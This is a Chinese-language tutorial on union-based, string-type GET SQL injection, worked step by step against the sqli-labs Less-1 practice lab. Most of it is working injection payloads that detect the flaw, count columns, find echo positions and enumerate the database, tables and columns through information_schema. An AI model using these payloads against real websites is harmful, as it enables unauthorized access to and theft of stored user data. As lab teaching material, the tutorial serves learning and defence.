网络安全|网络安全——基于联合查询的字符型GET注入安全|sql|web安全

一、原理
字符型GET注入，其注入点存在于URL中的GET参数处，如http://www.testweb.com/user.php?id=admin，而服务器后端实际查询代码原型诸如：“select … from … where id=’$id’…” 。
攻击者可以通过构造恶意的GET输入参数，利用union select命令进行注入，暴露数据库中存储的信息。
二、例子
使用sqli-labs中的第一关
1、根据网页提示，先给定一个GET参数，即：

http://[靶机IP]/sqli-labs/Less-1/?id=1

此时页面显示id=1的用户名Dump、密码Dump。

文章图片

2、寻找注入点
分别使用以下3条payload寻找注入点及判断注入点的类型：

http://[靶机IP]/sqli-labs/Less-1/?id=1'

运行后报错！

文章图片

http://[靶机IP]/sqli-labs/Less-1/?id=1' and '1'='1

运行后正常显示！

文章图片

http://[靶机IP]/sqli-labs/Less-1/?id=1' and '1'='2

运行后未正常显示！

文章图片

由上述结果可以判断，网站存在字符型注入点。
3．判断网站查询的字段数
尝试使用以下payload获取网站查询的字段数（关键字order by）：

http://[靶机IP]/sqli-labs/Less-1/?id=1' order by 1--+

文章图片

http://[靶机IP]/sqli-labs/Less-1/?id=1' order by 2--+

正常显示！

文章图片

http://[靶机IP]/sqli-labs/Less-1/?id=1' order by 3--+

正常显示！

文章图片

http://[靶机IP]/sqli-labs/Less-1/?id=1' order by 4--+

报错！

文章图片

由上述结果可以判断，网站查询的字段数为3。
4．判断网站的回显位置
利用以下payload判断网站的回显位置：

http://[靶机IP]/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,3--+

文章图片

5．获取网站当前所在数据库的库名
使用以下payload获取网站当前所在数据库的库名：

http://[靶机IP]/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,database()--+

显示结果为security。

文章图片

6．获取数据库security的全部表名
使用以下payload获取数据库security的全部表名：

http://[靶机IP]/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

显示结果中，有一个名为users的表，这当中可能存放着网站用户的基本信息。

文章图片

7．获取users表的全部字段名
使用以下payload获取users表的全部字段名：

http://[靶机IP]/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

显示结果，users表中有id、username和password三个字段。